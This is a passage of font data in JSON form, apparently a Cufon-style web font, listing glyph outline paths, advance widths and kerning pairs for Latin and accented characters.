"\u0152":5,"\u00d3":5,"\u00d4":5,"\u00d6":5,"\u00d2":5,"\u00d5":5,"u":13,"\u00fa":13,"\u00fb":13,"\u00f9":13,",":38,".":38,"A":18,"\u00c6":18,"\u00c1":18,"\u00c2":18,"\u00c4":18,"\u00c0":18,"\u00c5":18,"\u00c3":18,"h":2,"a":21,"\u00e6":21,"\u00e1":21,"\u00e2":21,"\u00e0":21,"\u00e5":21,"\u00e3":21,"e":22,"\u00e9":22,"\u00eb":22,"\u00e8":22,"i":4,"\u00ed":4,"\u00ee":4,"\u00ef":4,"\u00ec":4,"o":22,"\u00f8":22,"\u0153":22,"\u00f3":22,"\u00f4":22,"\u00f2":22,"\u00f5":22,"-":14,"r":8,":":10,";":12}},"X":{"d":"3,0r92,-138r-86,-128r34,0r69,106r69,-106r34,0r-86,129r92,137r-34,0r-76,-116r-75,116r-33,0","w":224,"k":{"C":14,"\u00c7":14,"O":14,"\u00d8":14,"\u0152":14,"\u00d3":14,"\u00d4":14,"\u00d6":14,"\u00d2":14,"\u00d5":14,"a":12,"\u00e6":12,"\u00e1":12,"\u00e2":12,"\u00e4":12,"\u00e0":12,"\u00e5":12,"\u00e3":12,"e":12,"\u00e9":12,"\u00ea":12,"\u00eb":12,"\u00e8":12,"o":12,"\u00f8":12,"\u0153":12,"\u00f3":12,"\u00f4":12,"\u00f6":12,"\u00f2":12,"\u00f5":12}},"Y":{"d":"90,0r0,-94r-85,-172r32,0r68,144r69,-144r32,0r-86,172r0,94r-30,0","w":210,"k":{"\u00fc":28,"\u00f6":37,"v":12,"O":15,"\u00d8":15,"\u0152":15,"\u00d3":15,"\u00d4":15,"\u00d6":15,"\u00d2":15,"\u00d5":15,"u":28,"\u00fa":28,"\u00fb":28,"\u00f9":28,",":48,".":48,"A":34,"\u00c6":34,"\u00c1":34,"\u00c2":34,"\u00c4":34,"\u00c0":34,"\u00c5":34,"\u00c3":34,"a":37,"\u00e6":37,"\u00e1":37,"\u00e2":37,"\u00e4":37,"\u00e0":37,"\u00e5":37,"\u00e3":37,"e":37,"\u00e9":37,"\u00ea":37,"\u00eb":37,"\u00e8":37,"i":8,"\u00ed":8,"\u00ee":8,"\u00ef":8,"\u00ec":8,"o":37,"\u00f8":37,"\u0153":37,"\u00f3":37,"\u00f4":37,"\u00f2":37,"\u00f5":37,"q":37,"-":41,":":21,";":23,"p":25,"S":14,"\u0160":14}},"Z":{"d":"171,-244r-128,218r133,0r0,26r-169,0r0,-19r131,-221r-135,0r0,-26r168,0r0,22","w":179},"[":{"d":"133,46r0,24r-88,0r0,-336r88,0r0,23r-62,0r0,289r62,0","w":158},"\\":{"d":"141,36r-116,-302r30,0r116,302r-30,0","w":195},"]":{"d":"26,70r0,-24r61,0r0,-289r-61,0r0,-23r88,0r0,336r-88,0","w":158},"^":{"d":"32,-135r62,-131r28,0r62,131r-29,0r-47,-107r-47,107r-29,0","w":216},"_":{"d":"180,45r-180,0r0,-18r180,0r0,18","w":180},"a":{"d":"220,-194r0,194r-26,0r0,-40v-15,29,-45,45,-80,45v-63,0,-100,-49,-100,-102v0,-57,41,-102,100,-102v41,0,71,24,80,46r0,-41r26,0xm194,-97v0,-47,-33,-78,-77,-78v-45,0,-77,35,-77,79v0,35,25,77,78,77v45,0,76,-32,76,-78","w":246},"b":{"d":"26,0r0,-266r27,0r0,111v44,-79,178,-42,178,58v0,58,-41,102,-100,102v-36,0,-66,-17,-80,-45r0,40r-25,0xm204,-97v0,-44,-33,-78,-76,-78v-45,0,-77,35,-77,78v0,42,31,78,76,78v51,0,77,-41,77,-78","w":244,"k":{"v":4,"y":7,"\u00fd":7,"\u00ff":7,",":13,".":13}},"c":{"d":"187,-127v-28,-79,-147,-54,-147,30v0,46,35,78,77,78v37,0,62,-24,70,-47r28,0v-13,41,-51,71,-97,71v-66,0,-104,-50,-104,-102v0,-57,43,-102,102,-102v44,0,86,26,99,72r-28,0","w":226,"k":{",":2,"h":2,"k":2,"l":2,"\u0142":2}},"d":{"d":"220,-266r0,266r-26,0r0,-40v-14,26,-40,45,-80,45v-62,0,-100,-48,-100,-102v0,-58,42,-102,100,-102v42,0,70,25,79,45r0,-112r27,0xm195,-98v-1,-43,-34,-76,-77,-77v-45,0,-78,34,-78,78v0,39,28,78,78,78v44,0,78,-35,77,-79","w":246},"e":{"d":"208,-58v-16,37,-47,62,-95,63v-67,0,-102,-53,-102,-101v0,-87,112,-137,173,-76v22,22,33,52,30,83r-176,0v4,84,113,92,142,31r28,0xm38,-111r150,0v-2,-34,-35,-65,-75,-65v-42,0,-72,30,-75,65","w":226,"k":{"v":6,"y":6,"\u00fd":6,"\u00ff":6,"w":5,",":2,".":3,"x":5}},"f":{"d":"31,0r0,-172r-29,0r0,-22r29,0r0,-16v0,-60,47,-61,68,-61r0,21v-16,-4,-48,13,-42,56r42,0r0,22r-42,0r0,172r-26,0","w":100,"k":{"\u0131":12,",":18,".":18,"l":12,"\u0142":12,"a":10,"\u00e6":10,"\u00e1":10,"\u00e2":10,"\u00e4":10,"\u00e0":10,"\u00e5":10,"\u00e3":10,"e":10,"\u00e9":10,"\u00ea":10,"\u00eb":10,"\u00e8":10,"f":12,"\u00df":12,"i":12,"\u00ed":12,"\u00ee":12,"\u00ef":12,"\u00ec":12,"o":10,"\u00f8":10,"\u0153":10,"\u00f3":10,"\u00f4":10,"\u00f6":10,"\u00f2":10,"\u00f5":10}},"g":{"d":"52,21v7,18,42,40,66,40v45,0,83,-40,75,-102v-14,27,-41,46,-78,46v-60,0,-101,-45,-101,-101v0,-58,42,-103,101,-103v38,0,67,21,78,45r0,-40r27,0r0,172v1,69,-46,106,-103,106v-48,0,-83,-28,-95,-63r30,0xm194,-96v0,-40,-28,-78,-77,-78v-42,0,-77,32,-77,77v0,39,28,78,78,78v43,0,76,-35,76,-77","w":245,"k":{",":3,".":3}},"h":{"d":"115,-174v-81,0,-60,98,-62,174r-27,0r0,-266r27,0r0,104v12,-26,42,-37,69,-37v99,0,81,106,82,199r-26,0v-3,-76,20,-174,-63,-174","w":229,"k":{"y":8,"\u00fd":8,"\u00ff":8,"u":6,"\u00fa":6,"\u00fb":6,"\u00fc":6,"\u00f9":6}},"i":{"d":"26,-229r0,-37r27,0r0,37r-27,0xm26,0r0,-194r27,0r0,194r-27,0","w":78},"j":{"d":"33,-229r0,-37r27,0r0,37r-27,0xm60,-194r0,191v2,38,-9,77,-63,79r0,-23v33,-1,36,-25,36,-55r0,-192r27,0","w":91},"k":{"d":"27,0r0,-266r26,0r0,152r87,-80r33,0r-93,85r97,109r-31,0r-93,-103r0,103r-26,0","w":182,"k":{"y":7,"\u00fd":7,"\u00ff":7,"a":13,"\u00e6":13,"\u00e1":13,"\u00e2":13,"\u00e4":13,"\u00e0":13,"\u00e5":13,"\u00e3":13,"e":13,"\u00e9":13,"\u00ea":13,"\u00eb":13,"\u00e8":13,"o":13,"\u00f8":13,"\u0153":13,"\u00f3":13,"\u00f4":13,"\u00f6":13,"\u00f2":13,"\u00f5":13}},"l":{"d":"26,0r0,-266r27,0r0,266r-27,0","w":78},"m":{"d":"159,0v-5,-71,23,-174,-52,-174v-73,0,-51,103,-54,174r-27,0r0,-194r25,0r0,31v27,-54,109,-42,127,6v10,-20,36,-42,67,-42v50,0,74,35,74,91r0,108r-26,0v-5,-71,22,-174,-53,-174v-34,0,-54,26,-54,66r0,108r-27,0","w":344,"k":{"y":8,"\u00fd":8,"\u00ff":8,"u":6,"\u00fa":6,"\u00fb":6,"\u00fc":6,"\u00f9":6}},"n":{"d":"26,0r0,-194r25,0r0,35v11,-25,37,-41,72,-40v103,2,78,105,81,199r-26,0v-3,-76,21,-174,-62,-174v-82,0,-61,98,-63,174r-27,0","w":229,"k":{"v":10,"y":12,"\u00fd":12,"\u00ff":12,"u":6,"\u00fa":6,"\u00fb":6,"\u00fc":6,"\u00f9":6}},"o":{"d":"14,-97v0,-54,41,-102,103,-102v63,0,103,48,103,102v0,54,-40,102,-103,102v-62,0,-103,-48,-103,-102xm117,-174v-43,0,-77,33,-77,78v0,44,34,77,77,77v43,0,76,-34,76,-78v0,-44,-33,-77,-76,-77","w":233,"k":{"v":9,"y":8,"\u00fd":8,"\u00ff":8,"w":7,",":9,".":10,"x":10}},"p":{"d":"26,73r0,-267r25,0r0,41v16,-28,44,-46,81,-46v65,0,99,53,99,103v0,54,-39,101,-99,101v-43,0,-70,-25,-79,-45r0,113r-27,0xm51,-96v0,44,33,77,77,77v44,0,77,-34,77,-78v0,-36,-26,-78,-78,-78v-44,0,-76,34,-76,79","w":246,"k":{"y":7,"\u00fd":7,"\u00ff":7,",":9,".":10}},"q":{"d":"220,-194r0,267r-27,0r0,-112v-9,20,-36,44,-80,44v-60,0,-99,-47,-99,-101v0,-57,40,-103,100,-103v40,0,67,20,80,44r0,-39r26,0xm118,-19v67,0,101,-89,55,-133v-14,-14,-34,-23,-55,-23v-52,0,-78,42,-78,79v0,42,33,77,78,77","w":245},"r":{"d":"26,0r0,-194r25,0r0,32v14,-29,39,-36,62,-37v-1,8,3,22,-2,26v-75,-5,-58,100,-59,173r-26,0","w":115,"k":{"v":-6,"y":-7,"\u00fd":-7,"\u00ff":-7,",":30,".":30,"a":15,"\u00e6":15,"\u00e1":15,"\u00e2":15,"\u00e4":15,"\u00e0":15,"\u00e5":15,"\u00e3":15,"e":14,"\u00e9":14,"\u00ea":14,"\u00eb":14,"\u00e8":14,"o":15,"\u00f8":15,"\u0153":15,"\u00f3":15,"\u00f4":15,"\u00f6":15,"\u00f2":15,"\u00f5":15,"c":15,"\u00e7":15,"d":12,"\u0131":12,"g":10,"q":9,"t":-10,"-":17}},"s":{"d":"118,-53v0,-48,-98,-32,-98,-91v0,-69,115,-78,119,-1r-26,0v0,-21,-14,-32,-33,-32v-21,0,-36,14,-34,31v6,49,99,23,99,90v0,36,-27,61,-64,61v-31,0,-67,-19,-67,-60r27,0v0,52,77,47,77,2","w":162,"k":{"w":8,",":4,".":5}},"t":{"d":"41,0r0,-172r-38,0r0,-22r38,0r0,-72r26,0r0,72r43,0r0,22r-43,0r0,172r-26,0","w":113,"k":{"a":11,"\u00e6":11,"\u00e1":11,"\u00e2":11,"\u00e4":11,"\u00e0":11,"\u00e5":11,"\u00e3":11,"e":11,"\u00e9":11,"\u00ea":11,"\u00eb":11,"\u00e8":11,"o":11,"\u00f8":11,"\u0153":11,"\u00f3":11,"\u00f4":11,"\u00f6":11,"\u00f2":11,"\u00f5":11}},"u":{"d":"204,-194r0,194r-25,0r0,-35v-11,25,-37,40,-72,40v-103,-2,-78,-105,-81,-199r26,0v3,76,-21,175,62,175v82,0,61,-99,63,-175r27,0","w":230},"v":{"d":"183,-194r-76,194r-28,0r-76,-194r28,0r62,161r62,-161r28,0","w":186,"k":{",":32,".":32,"a":9,"\u00e6":9,"\u00e1":9,"\u00e2":9,"\u00e4":9,"\u00e0":9,"\u00e5":9,"\u00e3":9,"e":9,"\u00e9":9,"\u00ea":9,"\u00eb":9,"\u00e8":9,"o":9,"\u00f8":9,"\u0153":9,"\u00f3":9,"\u00f4":9,"\u00f6":9,"\u00f2":9,"\u00f5":9}},"w":{"d":"71,0r-68,-194r28,0r54,160r46,-142r22,0r47,142r53,-160r27,0r-67,194r-26,0r-46,-141r-45,141r-25,0","w":283,"k":{",":29,".":29,"a":7,"\u00e6":7,"\u00e1":7,"\u00e2":7,"\u00e4":7,"\u00e0":7,"\u00e5":7,"\u00e3":7,"e":6,"\u00e9":6,"\u00ea":6,"\u00eb":6,"\u00e8":6,"o":7,"\u00f8":7,"\u0153":7,"\u00f3":7,"\u00f4":7,"\u00f6":7,"\u00f2":7,"\u00f5":7}},"x":{"d":"3,0r67,-99r-65,-95r33,0r48,75r49,-75r32,0r-64,95r68,99r-33,0r-52,-78r-51,78r-32,0","w":173,"k":{"a":10,"\u00e6":10,"\u00e1":10,"\u00e2":10,"\u00e4":10,"\u00e0":10,"\u00e5":10,"\u00e3":10,"e":10,"\u00e9":10,"\u00ea":10,"\u00eb":10,"\u00e8":10,"o":10,"\u00f8":10,"\u0153":10,"\u00f3":10,"\u00f4":10,"\u00f6":10,"\u00f2":10,"\u00f5":10}},"y":{"d":"45,73r33,-77r-75,-190r28,0r61,157r63,-157r29,0r-111,267r-28,0","w":184,"k":{",":31,".":32,"a":8,"\u00e6":8,"\u00e1":8,"\u00e2":8,"\u00e4":8,"\u00e0":8,"\u00e5":8,"\u00e3":8,"e":8,"\u00e9":8,"\u00ea":8,"\u00eb":8,"\u00e8":8,"o":8,"\u00f8":8,"\u0153":8,"\u00f3":8,"\u00f4":8,"\u00f6":8,"\u00f2":8,"\u00f5":8,"r":2}},"z":{"d":"5,0r0,-19r107,-153r-103,0r0,-22r133,0r0,22r-105,151r109,0r0,21r-141,0","w":150},"{":{"d":"140,-270r0,22v-29,-1,-43,-1,-41,35v3,53,2,114,-32,128v36,8,34,75,32,125v-2,38,11,37,41,36r0,21v-42,3,-69,-1,-69,-47v0,-49,8,-111,-31,-121r0,-28v34,-3,32,-78,31,-125v-1,-46,27,-48,69,-46","w":168},"|":{"d":"85,-270r29,0r0,360r-29,0r0,-360","w":199},"}":{"d":"28,-248r0,-22v42,-2,70,0,69,46v-2,48,-3,122,31,125r0,28v-64,9,7,166,-69,168r-31,0r0,-21v30,1,41,3,41,-36r0,-70v0,-29,21,-50,33,-55v-38,-14,-35,-75,-33,-128v2,-36,-11,-36,-41,-35","w":168},"~":{"d":"189,-91v-35,74,-119,-43,-154,25r-9,-23v9,-17,25,-29,45,-28v26,0,56,25,79,26v14,0,23,-13,31,-24","w":216},"\u00a1":{"d":"37,-154r0,-40r28,0r0,40r-28,0xm37,72r0,-197r28,0r0,197r-28,0","w":102},"\u00a2":{"d":"119,-13r-24,0r0,-38v-52,-8,-71,-51,-71,-82v0,-32,20,-75,71,-83r0,-35r23,0r0,35v28,5,54,22,66,53r-29,0v-31,-53,-106,-23,-104,29v0,29,19,57,56,57v27,0,42,-16,47,-26r30,0v-14,33,-44,48,-65,52r0,38"},"\u00a3":{"d":"202,-90v8,55,-19,90,-81,90r-107,0r0,-24v40,1,64,3,64,-41v0,-24,-14,-41,-33,-57r-42,0r0,-22r27,0v-36,-51,5,-127,75,-127v41,0,80,26,88,73r-29,0v-6,-26,-27,-47,-58,-47v-51,-1,-80,63,-44,101r85,0r0,22r-69,0v23,18,47,59,14,98v57,7,97,-17,83,-66r27,0"},"\u00a5":{"d":"194,-161r0,23r-70,0v-6,8,-7,21,-6,35r76,0r0,23r-76,0r0,80r-29,0r0,-80r-75,0r0,-23r75,0v1,-15,0,-28,-7,-35r-68,0r0,-23r56,0r-62,-105r31,0r64,112r65,-112r32,0r-63,105r57,0"},"\u0192":{"d":"105,-184v4,-47,29,-95,86,-86r-4,22v-42,-4,-51,33,-55,64r43,0r0,22r-46,0v-17,71,-16,153,-48,211v-13,23,-45,30,-79,24r5,-25v39,13,66,-21,65,-49r29,-161r-43,0r0,-22r47,0"},"\u00a7":{"d":"184,-206r-26,0v-5,-59,-90,-50,-92,-1v19,73,133,31,133,121v0,25,-15,44,-33,56v48,43,15,116,-55,116v-43,0,-86,-24,-85,-82r27,0v0,39,22,57,57,57v59,1,68,-60,17,-83r-68,-31v-12,-6,-40,-18,-40,-59v0,-15,8,-39,36,-56v-6,-8,-15,-20,-15,-39v0,-42,35,-64,72,-64v44,0,71,27,72,65xm174,-82v0,-23,-18,-32,-33,-39r-70,-33v-35,14,-34,61,-2,76r78,36v12,-5,27,-21,27,-40","w":217},"\u00a4":{"d":"183,-30r-29,-28v-28,24,-73,23,-101,0r-29,28r-14,-15r29,-28v-24,-28,-24,-73,0,-101r-30,-28r15,-15r29,29v28,-24,73,-23,101,0r29,-29r14,15r-28,28v23,28,24,74,-1,101r29,28xm46,-123v0,31,27,57,58,57v31,0,57,-26,57,-57v0,-32,-26,-57,-57,-57v-31,0,-58,25,-58,57"},"'":{"d":"52,-160r-22,0r0,-106r22,0r0,106","w":82},"\u00ab":{"d":"14,-100r39,-69r22,0r-39,69r39,67r-22,0xm62,-100r40,-69r22,0r-39,69r39,67r-22,0","w":135},"\u00b7":{"d":"66,-112r0,40r-28,0r0,-40r28,0","w":104},"\u00b6":{"d":"82,42r0,-167v-45,0,-80,-22,-80,-70v0,-94,103,-67,189,-71r0,20r-21,0r0,288r-23,0r0,-287r-43,0r0,287r-22,0","w":218},"\u00bb":{"d":"82,-168r39,68r-39,68r-23,0r40,-68r-40,-68r23,0xm33,-168r39,68r-39,68r-22,0r39,-68r-39,-68r22,0","w":135},"\u00bf":{"d":"91,-154r0,-40r28,0r0,40r-28,0xm91,-126r28,0v-1,24,-5,45,-34,72v-19,19,-33,31,-34,53v-2,59,95,70,103,6v0,-3,1,-6,1,-10r29,0v1,111,-164,102,-162,6v0,-30,22,-50,42,-69v26,-25,27,-44,27,-58","w":199},"`":{"d":"57,-281r86,49r-8,17r-87,-46","w":199},"\u00b4":{"d":"57,-233r85,-49r10,20r-87,46","w":199},"\u00af":{"d":"164,-256r0,22r-128,0r0,-22r128,0","w":199},"\u00a8":{"d":"79,-269r0,46r-26,0r0,-46r26,0xm147,-269r0,46r-26,0r0,-46r26,0","w":199},"\u00b8":{"d":"107,0r-9,20v17,-5,33,10,33,27v0,31,-50,51,-62,4r16,0v7,19,29,15,30,-4v0,-16,-22,-20,-28,-7r-13,-5r16,-35r17,0","w":199},"\u00c6":{"d":"-3,0r184,-266r139,0r0,26r-104,0r0,92r103,0r0,27r-103,0r0,95r104,0r0,26r-132,0r0,-78r-102,0r-54,78r-35,0xm100,-102r88,0r0,-128","w":343},"\u00aa":{"d":"134,-268r0,114r-18,0r0,-23v-26,51,-107,20,-107,-34v0,-58,83,-82,107,-33r0,-24r18,0xm116,-211v0,-25,-20,-42,-44,-43v-23,0,-44,18,-44,44v0,18,15,42,44,42v26,-1,44,-18,44,-43","w":151},"\u0141":{"d":"1,-86r0,-31r27,-20r0,-129r30,0r0,107r51,-36r0,30r-51,38r0,101r101,0r0,26r-131,0r0,-106","w":159,"k":{"y":12,"\u00fd":12,"\u00ff":12,"O":19,"\u00d8":19,"\u0152":19,"\u00d3":19,"\u00d4":19,"\u00d6":19,"\u00d2":19,"\u00d5":19,"T":24,"V":39,"W":19,"Y":34,"\u00dd":34,"\u0178":34,"o":10,"\u00f8":10,"\u0153":10,"\u00f3":10,"\u00f4":10,"\u00f6":10,"\u00f2":10,"\u00f5":10}},"\u00d8":{"d":"226,-251r21,-30r31,0r-32,44v25,21,46,57,46,104v0,105,-120,173,-210,119r-21,28r-30,0r31,-42v-26,-22,-48,-57,-48,-105v0,-106,119,-174,212,-118xm80,-52r129,-177v-71,-45,-165,13,-165,95v0,34,14,64,36,82xm228,-214r-129,178v73,42,163,-17,163,-97v0,-32,-13,-60,-34,-81","w":306,"k":{"T":18,"V":17,"W":5,"Y":15,"\u00dd":15,"\u0178":15,",":15,".":15,"A":14,"\u00c6":14,"\u00c1":14,"\u00c2":14,"\u00c4":14,"\u00c0":14,"\u00c5":14,"\u00c3":14,"X":14}},"\u0152":{"d":"289,-240r0,92r102,0r0,27r-102,0r0,95r103,0r0,26r-132,0r0,-61v-19,40,-62,66,-108,66v-78,0,-138,-59,-138,-138v0,-78,57,-138,137,-138v54,0,95,28,109,65r0,-60r132,0r0,26r-103,0xm152,-245v-63,0,-108,49,-108,113v0,60,44,110,108,110v64,0,108,-51,108,-112v0,-62,-44,-111,-108,-111","w":412,"k":{"T":18,"V":17,"W":5,"Y":15,"\u00dd":15,"\u0178":15,",":15,".":15,"A":14,"\u00c6":14,"\u00c1":14,"\u00c2":14,"\u00c4":14,"\u00c0":14,"\u00c5":14,"\u00c3":14,"X":14}},"\u00ba":{"d":"75,-151v-35,0,-60,-28,-60,-60v0,-32,24,-60,60,-60v38,0,61,29,61,60v0,34,-27,60,-61,60xm33,-210v0,22,19,42,42,42v22,0,43,-18,43,-43v0,-23,-18,-43,-42,-43v-22,0,-43,18,-43,44","w":151},"\u00e6":{"d":"394,-90r-175,0v15,98,111,83,141,32r28,0v-21,68,-142,90,-170,12r0,46r-25,0r0,-46v-10,29,-42,51,-78,51v-70,0,-101,-58,-101,-101v0,-58,43,-103,101,-103v38,0,64,19,78,49r0,-44r25,0r0,44v22,-59,109,-63,148,-19v18,19,29,47,28,79xm194,-97v0,-43,-35,-77,-77,-78v-47,0,-77,38,-77,78v0,45,34,78,78,78v42,0,76,-37,76,-78xm220,-109r147,0v-10,-68,-83,-89,-128,-43v-14,15,-16,30,-19,43","w":407},"\u0131":{"d":"26,0r0,-194r27,0r0,194r-27,0","w":78},"\u0142":{"d":"33,-119r-26,19r0,-28r26,-19r0,-119r27,0r0,103r31,-22r0,27r-31,23r0,135r-27,0r0,-119","w":93},"\u00f8":{"d":"183,-206r27,0r-24,33v66,56,29,182,-69,178v-22,0,-38,-5,-51,-13r-15,20r-28,0r24,-33v-64,-54,-29,-178,70,-178v22,0,39,5,51,13xm64,-42r89,-122v-49,-29,-113,10,-113,67v0,23,10,43,24,55xm170,-151r-89,122v50,30,112,-12,112,-68v0,-23,-9,-42,-23,-54","w":233,"k":{"v":9,"y":8,"\u00fd":8,"\u00ff":8,"w":7,",":9,".":10,"x":10}},"\u0153":{"d":"386,-58v-6,26,-51,63,-93,63v-47,0,-76,-28,-88,-58v-17,39,-50,58,-89,58v-147,0,-125,-206,1,-204v41,0,74,24,88,58v8,-21,34,-57,87,-57v60,0,104,52,101,108r-174,0v2,82,110,95,139,32r28,0xm117,-175v-42,0,-77,32,-77,79v0,43,33,77,77,77v99,-1,99,-156,0,-156xm219,-110r146,0v-3,-27,-27,-65,-73,-65v-37,0,-68,26,-73,65","w":406,"k":{"v":9,"y":8,"\u00fd":8,"\u00ff":8,"w":7,",":9,".":10,"x":10}},"\u00df":{"d":"25,-165v-5,-73,28,-102,80,-107v77,-7,101,104,40,131v92,17,65,146,-25,146v-32,0,-61,-16,-68,-55r0,50r-27,0r0,-165xm103,-247v-72,1,-47,104,-51,176r17,0v3,76,109,61,108,0v0,-29,-29,-63,-83,-53r0,-21v35,3,60,-17,60,-51v0,-33,-21,-51,-51,-51","w":217,"k":{"w":8,",":4,".":5}},"\u00b9":{"d":"80,-266r0,159r-22,0r0,-141r-32,0r0,-18r54,0","w":133},"\u00ac":{"d":"18,-140r180,0r0,94r-25,0r0,-68r-155,0r0,-26","w":216},"\u00b5":{"d":"105,-19v71,-4,54,-102,56,-175r26,0r0,194r-26,0r0,-37v-5,13,-17,41,-56,41v-33,0,-48,-18,-54,-28r0,90r-26,0r0,-260r26,0r0,105v-6,35,23,72,54,70","w":210},"\u00d0":{"d":"107,-266v73,-5,136,52,136,132v0,80,-48,134,-133,134r-83,0r0,-122r-27,0r0,-26r27,0r0,-118r80,0xm213,-132v0,-85,-61,-118,-157,-108r0,92r74,0r0,26r-74,0r0,96v94,9,157,-21,157,-106","w":257,"k":{"V":11,"W":3,"Y":18,"\u00dd":18,"\u0178":18,",":24,".":22,"A":15,"\u00c6":15,"\u00c1":15,"\u00c2":15,"\u00c4":15,"\u00c0":15,"\u00c5":15,"\u00c3":15}},"\u00bd":{"d":"70,-266r0,159r-21,0r0,-141r-33,0r0,-18r54,0xm197,-266r-117,266r-23,0r116,-266r24,0xm169,-106v-3,-33,26,-57,53,-57v56,0,62,60,28,94r-50,50r74,0r0,19r-106,0r0,-17v25,-29,72,-57,82,-96v0,-15,-7,-31,-29,-31v-19,0,-30,16,-30,38r-22,0","w":290},"\u00b1":{"d":"95,-125r0,-63r26,0r0,63r78,0r0,26r-78,0r0,63r-26,0r0,-63r-78,0r0,-26r78,0xm17,10r0,-26r182,0r0,26r-182,0","w":216},"\u00de":{"d":"194,-137v0,70,-57,88,-140,81r0,56r-30,0r0,-266r30,0r0,49r40,0v72,-5,100,26,100,80xm166,-136v0,-55,-52,-58,-112,-55r0,109v59,2,112,2,112,-54","w":198},"\u00bc":{"d":"197,-266r-117,266r-23,0r116,-266r24,0xm222,-132r-56,85r56,0r0,-85xm70,-266r0,159r-21,0r0,-141r-33,0r0,-18r54,0xm243,-160r0,113r17,0r0,17r-17,0r0,30r-21,0r0,-30r-80,0r0,-15r79,-115r22,0","w":275},"\u00f7":{"d":"121,-188r0,39r-26,0r0,-39r26,0xm18,-77r0,-26r180,0r0,26r-180,0xm121,-32r0,39r-26,0r0,-39r26,0","w":216},"\u00a6":{"d":"85,-243r29,0r0,126r-29,0r0,-126xm85,-63r29,0r0,126r-29,0r0,-126","w":199},"\u00b0":{"d":"123,-204v0,28,-22,51,-51,51v-29,0,-51,-22,-51,-51v0,-29,22,-52,51,-52v29,0,51,23,51,52xm37,-204v0,19,16,35,35,35v19,0,35,-16,35,-35v0,-19,-16,-35,-35,-35v-19,0,-35,16,-35,35","w":144},"\u00fe":{"d":"26,73r0,-339r26,0r0,113v52,-90,181,-36,181,57v0,57,-43,101,-100,101v-40,0,-68,-22,-81,-45r0,113r-26,0xm51,-96v0,41,35,77,78,77v45,0,77,-35,77,-78v0,-42,-31,-77,-77,-77v-43,0,-78,35,-78,78","w":246,"k":{"v":4,"y":7,"\u00fd":7,"\u00ff":7,",":13,".":13}},"\u00be":{"d":"261,-133r-57,86r57,0r0,-86xm236,-266r-116,266r-24,0r116,-266r24,0xm282,-160r0,113r16,0r0,17r-16,0r0,30r-21,0r0,-30r-80,0r0,-15r79,-115r22,0xm14,-155r23,0v0,47,65,40,65,1v0,-17,-18,-37,-48,-32r0,-17v24,3,39,-12,39,-24v0,-12,-8,-24,-23,-24v-16,0,-23,11,-24,24r-22,0v5,-61,89,-52,90,-2v0,16,-10,27,-20,33v50,17,31,92,-25,92v-27,0,-56,-21,-55,-51","w":313},"\u00b2":{"d":"14,-213v-4,-33,27,-56,53,-56v56,0,64,63,28,93v-18,15,-34,34,-51,51r75,0r0,18r-106,0r0,-17v24,-29,72,-57,81,-96v0,-15,-6,-31,-28,-31v-19,0,-31,16,-31,38r-21,0","w":133},"\u00ae":{"d":"6,-133v0,-75,59,-138,139,-138v77,0,137,62,137,138v0,77,-62,137,-138,137v-77,0,-138,-59,-138,-137xm144,-255v-69,0,-121,55,-121,122v0,68,53,122,121,122v67,0,121,-53,121,-122v0,-66,-52,-122,-121,-122xm189,-54v-12,-21,12,-76,-46,-68r-39,0r0,68r-19,0r0,-158v55,5,121,-21,121,43v0,16,-7,31,-29,39v18,5,25,17,26,36v2,30,2,34,5,40r-19,0xm187,-168v-8,-45,-46,-24,-83,-29r0,60v39,-4,73,14,83,-31","w":288},"\u00f0":{"d":"174,-172v-13,-22,-38,-41,-58,-53r-83,26r0,-20r61,-19v-16,-8,-33,-14,-52,-21r28,-9v18,6,35,13,52,22r73,-22r0,20r-51,16v44,25,75,68,76,130v0,66,-48,107,-103,107v-54,0,-103,-36,-103,-101v0,-90,102,-133,160,-76xm40,-97v0,43,31,78,77,78v46,0,76,-37,76,-78v0,-41,-33,-78,-75,-78v-47,0,-78,36,-78,78","w":233},"\u00d7":{"d":"37,0r-18,-18r70,-71r-70,-70r18,-19r71,70r71,-70r18,19r-71,70r71,71r-18,18r-71,-71","w":216},"\u00b3":{"d":"10,-155r23,0v1,23,18,33,33,33v21,0,32,-14,32,-32v0,-17,-18,-37,-48,-32r0,-17v24,3,39,-12,39,-24v0,-12,-8,-24,-23,-24v-16,0,-23,11,-24,24r-22,0v5,-61,89,-52,90,-2v0,16,-10,27,-20,33v50,17,31,92,-25,92v-28,0,-55,-21,-55,-51","w":133},"\u00a9":{"d":"6,-133v0,-75,59,-138,139,-138v77,0,137,62,137,138v0,77,-62,137,-138,137v-77,0,-138,-59,-138,-137xm144,-255v-70,0,-121,56,-121,122v0,68,53,122,121,122v67,0,121,-53,121,-122v0,-67,-52,-122,-121,-122xm215,-161r-19,0v-19,-65,-108,-39,-108,27v0,45,29,65,58,65v9,0,47,-3,53,-49r19,0v-3,42,-35,67,-73,67v-40,0,-76,-29,-76,-82v0,-47,29,-83,77,-83v39,0,66,25,69,55","w":288},"\u00c1":{"d":"66,-75r-31,75r-32,0r111,-266r29,0r110,266r-32,0r-31,-75r-124,0xm181,-99r-54,-134r-52,134r106,0xm86,-296r85,-49r10,20r-86,46","w":255,"k":{"v":15,"y":13,"\u00fd":13,"\u00ff":13,"C":14,"\u00c7":14,"G":14,"O":14,"\u00d8":14,"\u0152":14,"\u00d3":14,"\u00d4":14,"\u00d6":14,"\u00d2":14,"\u00d5":14,"Q":14,"T":28,"u":12,"\u00fa":12,"\u00fb":12,"\u00fc":12,"\u00f9":12,"U":12,"\u00da":12,"\u00db":12,"\u00dc":12,"\u00d9":12,"V":36,"w":12,"W":18,"Y":34,"\u00dd":34,"\u0178":34}},"\u00c2":{"d":"66,-75r-31,75r-32,0r111,-266r29,0r110,266r-32,0r-31,-75r-124,0xm181,-99r-54,-134r-52,134r106,0xm138,-334r63,48r-30,0r-43,-29r-43,29r-30,0r63,-48r20,0","w":255,"k":{"v":15,"y":13,"\u00fd":13,"\u00ff":13,"C":14,"\u00c7":14,"G":14,"O":14,"\u00d8":14,"\u0152":14,"\u00d3":14,"\u00d4":14,"\u00d6":14,"\u00d2":14,"\u00d5":14,"Q":14,"T":28,"u":12,"\u00fa":12,"\u00fb":12,"\u00fc":12,"\u00f9":12,"U":12,"\u00da":12,"\u00db":12,"\u00dc":12,"\u00d9":12,"V":36,"w":12,"W":18,"Y":34,"\u00dd":34,"\u0178":34}},"\u00c4":{"d":"66,-75r-31,75r-32,0r111,-266r29,0r110,266r-32,0r-31,-75r-124,0xm181,-99r-54,-134r-52,134r106,0xm107,-332r0,46r-26,0r0,-46r26,0xm175,-332r0,46r-26,0r0,-46r26,0","w":255,"k":{"v":15,"y":13,"\u00f